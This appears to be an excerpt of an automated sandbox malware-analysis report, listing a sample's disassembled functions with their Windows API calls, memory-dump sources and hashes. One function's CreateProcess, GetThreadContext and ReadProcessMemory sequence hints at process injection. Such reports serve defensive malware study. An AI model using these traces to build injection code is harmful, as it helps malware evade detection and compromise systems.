                                                                                                                                                                  • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                                                                                                                  • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                                                                                                                                                                  • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                                                                                                                  • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                                                                                                                                                                  Function 0040F110 Relevance: 3.1, APIs: 2, Instructions: 51fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 0040F13A
                                                                                                                                                                  • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 00426326
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                                  • Opcode ID: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                                                                                                                                                  • Instruction ID: 8a88c5525f76e0b0fff62cf48ad84dc7055e673dbb4ccc29545257d8619b8f55
                                                                                                                                                                  • Opcode Fuzzy Hash: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                                                                                                                                                  • Instruction Fuzzy Hash: 16011D70784310BAF2305A68DD0BF5266546B45B24F20473ABBE5BE2D1D2F86885870C
                                                                                                                                                                  Function 0041E17F Relevance: 3.0, APIs: 2, Instructions: 45COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetFilePointer.KERNELBASE(00000000,00000109,00000000,004229EE,00000000,00000109,?,004229EE,00000109,00000000,00000000), ref: 0041E1AE
                                                                                                                                                                  • GetLastError.KERNEL32(?,004229EE,00000109,00000000,00000000), ref: 0041E1BB
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileLastPointer
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2976181284-0
                                                                                                                                                                  • Opcode ID: 3e97f01922c1d7d6761d37e8c042bb033ea193a6ffb3200a7d889d99da883567
                                                                                                                                                                  • Instruction ID: 3a52d99af4889aacde1065dfe3576237307748e1d7dc14bc5ca1c9168610e971
                                                                                                                                                                  • Opcode Fuzzy Hash: 3e97f01922c1d7d6761d37e8c042bb033ea193a6ffb3200a7d889d99da883567
                                                                                                                                                                  • Instruction Fuzzy Hash: 1F01F4366146517FC6111BBE9C089DB3B689F82334B210727FD31CB1E1DB38C88197A9
                                                                                                                                                                  Function 00413748 Relevance: 3.0, APIs: 2, Instructions: 22memoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • RtlFreeHeap.NTDLL(00000000,00000000,?,00417A5A,00000000), ref: 0041375E
                                                                                                                                                                  • GetLastError.KERNEL32(00000000,?,00417A5A,00000000), ref: 00413770
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFreeHeapLast
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 485612231-0
                                                                                                                                                                  • Opcode ID: 58c48c5ad80d96b9acf5d244c9eac1548db561dba17a1218556d1964a8a8cdaa
                                                                                                                                                                  • Instruction ID: 2371a508b7b006657431296420ef66ac3e5da02846a4165df707855177eb7138
                                                                                                                                                                  • Opcode Fuzzy Hash: 58c48c5ad80d96b9acf5d244c9eac1548db561dba17a1218556d1964a8a8cdaa
                                                                                                                                                                  • Instruction Fuzzy Hash: 7BE08C72004204ABCB212FB1EC08BDA3BA8AB40755F20447EF958C61A0DA7999C1C79C
                                                                                                                                                                  Function 0041D762 Relevance: 2.6, APIs: 2, Instructions: 61COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CloseHandle.KERNELBASE(00000000,00000000,00000109,?,004227A8,00000109), ref: 0041D7B4
                                                                                                                                                                  • GetLastError.KERNEL32(?,004227A8,00000109), ref: 0041D7BE
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseErrorHandleLast
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 918212764-0
                                                                                                                                                                  • Opcode ID: 291c0696bda2c6d0ea991a4c2892309895d6b13f0ed428eaface8a755dd0f5b9
                                                                                                                                                                  • Instruction ID: ee47189d5b6865b493d8c5c3ed26ce1959f7700021d2ad05630b2f7cd03a2383
                                                                                                                                                                  • Opcode Fuzzy Hash: 291c0696bda2c6d0ea991a4c2892309895d6b13f0ed428eaface8a755dd0f5b9
                                                                                                                                                                  • Instruction Fuzzy Hash: 3B01DB72D056501AD225373D6849FEB2B854F82739F29052BF8798B2D2DE6DCCC1825D
                                                                                                                                                                  Function 044012E5 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 04401AA3
                                                                                                                                                                  • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 04401B39
                                                                                                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 04401B5B
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703524933852.0000000004400000.00000040.00000020.00020000.00000000.sdmp, Offset: 04400000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_4400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2438371351-0
                                                                                                                                                                  • Opcode ID: 47f45bba1b7d6f78db91ee930b61901a72fbf3bd75938062ef2b5451d70cd9db
                                                                                                                                                                  • Instruction ID: 1a4a944ece0c24517df59e9a6cdc9a1a17479fa404bcaec699306f8de78e9b94
                                                                                                                                                                  • Opcode Fuzzy Hash: 47f45bba1b7d6f78db91ee930b61901a72fbf3bd75938062ef2b5451d70cd9db
                                                                                                                                                                  • Instruction Fuzzy Hash: DC12EC20E24658C6EB24DF60D8507DEB232EF68300F1090E9910DEB7A5E77A5F91CF5A
                                                                                                                                                                  Function 00410CFC Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 544645111-0
                                                                                                                                                                  • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                  • Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
                                                                                                                                                                  • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                  • Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
                                                                                                                                                                  Function 00408F40 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: b88f9543b806201cae42d4d121fbe4b2eaeb6b479e9688354450343e49ff2077
                                                                                                                                                                  • Instruction ID: 427b4a632c312742ac0951887501238d3178a51c37fde1d0fd35c98815df3d2a
                                                                                                                                                                  • Opcode Fuzzy Hash: b88f9543b806201cae42d4d121fbe4b2eaeb6b479e9688354450343e49ff2077
                                                                                                                                                                  • Instruction Fuzzy Hash: 21119674200201ABDB249F36D984E26B3A5AF45304B244D2FF9C5D7790DB7CE881DB5E
                                                                                                                                                                  Function 0045E17D Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 53ac66c0a220e583b8bd8a833cb4d0ab2488ecf71834bb63135a5f6edfec8b4a
                                                                                                                                                                  • Instruction ID: fe3c5e01fee558804f1d0cd68762aa03bf47037873853bda5dcd607d85013340
                                                                                                                                                                  • Opcode Fuzzy Hash: 53ac66c0a220e583b8bd8a833cb4d0ab2488ecf71834bb63135a5f6edfec8b4a
                                                                                                                                                                  • Instruction Fuzzy Hash: 2D118B352046019FDB10DF69D884E96B3E9AF8A314F14856EFD298B362CB35FC41CB95
                                                                                                                                                                  Function 004135BB Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                                                                                                    • Part of subcall function 00418752: GetModuleFileNameW.KERNEL32(00000000,00496872,00000104,00000001,004115F6,00000000), ref: 004187EE
                                                                                                                                                                    • Part of subcall function 00411682: ExitProcess.KERNEL32 ref: 00411693
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AllocateExitFileHeapModuleNameProcess
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1715456479-0
                                                                                                                                                                  • Opcode ID: 3ff309d41164d49bbcde26d9f3c6c10fc997a437c42b4e7195dd8d5bf0d35fe7
                                                                                                                                                                  • Instruction ID: dd3e10037244d4323a5b30826126ac5ac37045f84f17507dcfe2508c3b7f65da
                                                                                                                                                                  • Opcode Fuzzy Hash: 3ff309d41164d49bbcde26d9f3c6c10fc997a437c42b4e7195dd8d5bf0d35fe7
                                                                                                                                                                  • Instruction Fuzzy Hash: 9D01F5712543457AE7217B26AC41BEB37ACDB50B6AF21003BF100893A1CA6D89C2C73C
                                                                                                                                                                  Function 00443E36 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,?,004263D0,?,00487ACC,00000003,0040DE90,?,?,00000001), ref: 00443E54
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileWrite
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3934441357-0
                                                                                                                                                                  • Opcode ID: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                                                                                                                                                                  • Instruction ID: f8d6e32d6ecef3e6c51c5ea05c7ff41eb941b2b6d152ec47b845c679c5cedb0e
                                                                                                                                                                  • Opcode Fuzzy Hash: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                                                                                                                                                                  • Instruction Fuzzy Hash: 6BE01276100318ABDB10DF98D844FDA77BCEF48765F10891AFA048B200C7B4EA908BE4
                                                                                                                                                                  Function 00419D5A Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • HeapCreate.KERNELBASE(00000000,00001000,00000000,004164CD), ref: 00419D63
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateHeap
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 10892065-0
                                                                                                                                                                  • Opcode ID: ae856a24b7f14ff9795d6297db4acaadf8ea867ddb32ba412a60cc9424a8be80
                                                                                                                                                                  • Instruction ID: 2e78285c67f20dbf903d8901354c84d72f31961fc940439d2391f7b102ef2f30
                                                                                                                                                                  • Opcode Fuzzy Hash: ae856a24b7f14ff9795d6297db4acaadf8ea867ddb32ba412a60cc9424a8be80
                                                                                                                                                                  • Instruction Fuzzy Hash: E2C092B43813025BEB588B3AAC26B4925D45B08B42F21843EBA07DE5E0DAE19450AF08
                                                                                                                                                                  Function 00467897 Relevance: 1.4, APIs: 1, Instructions: 170COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetLastError.KERNEL32(00000000,00000000), ref: 004679C7
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1452528299-0
                                                                                                                                                                  • Opcode ID: f25d88b078144904bc5f108aaf886b145ed4007a512393d5c0d79f2ba5d3833f
                                                                                                                                                                  • Instruction ID: 5ded281afda408fdcd401bf2365ceabb828b89a129c607e264fb1023d06c7d2e
                                                                                                                                                                  • Opcode Fuzzy Hash: f25d88b078144904bc5f108aaf886b145ed4007a512393d5c0d79f2ba5d3833f
                                                                                                                                                                  • Instruction Fuzzy Hash: FB5126712083018BD710EF75C881A5BB3E5AF84318F044A6EF9559B381EB39ED09CB97
                                                                                                                                                                  Function 00416B04 Relevance: 1.3, APIs: 1, Instructions: 28sleepCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                                                                                                  • Sleep.KERNEL32(00000000,00000001,004115F6,?,00418256,00000018,0048D198,0000000C,004182E6,004115F6,004115F6,?,00417986,0000000D,?,004115F6), ref: 00416B25
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AllocateHeapSleep
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4201116106-0
                                                                                                                                                                  • Opcode ID: 5d235bca9f66459b9abae02b4cc3e09111839f09c7b85c5a4bac4fb0e10ac7ef
                                                                                                                                                                  • Instruction ID: 29b66831f95231b605567f83fe554f9f415e617bc059c2b68adb7d8a9d008894
                                                                                                                                                                  • Opcode Fuzzy Hash: 5d235bca9f66459b9abae02b4cc3e09111839f09c7b85c5a4bac4fb0e10ac7ef
                                                                                                                                                                  • Instruction Fuzzy Hash: B4E092329055255787306E7BE8448CB7B5ADBC13B1326073BF939C23D0D734ED828698
                                                                                                                                                                  Function 0040DA20 Relevance: 1.3, APIs: 1, Instructions: 22COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CloseHandle.KERNELBASE(?,?,00426FBF), ref: 0040DA3D
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
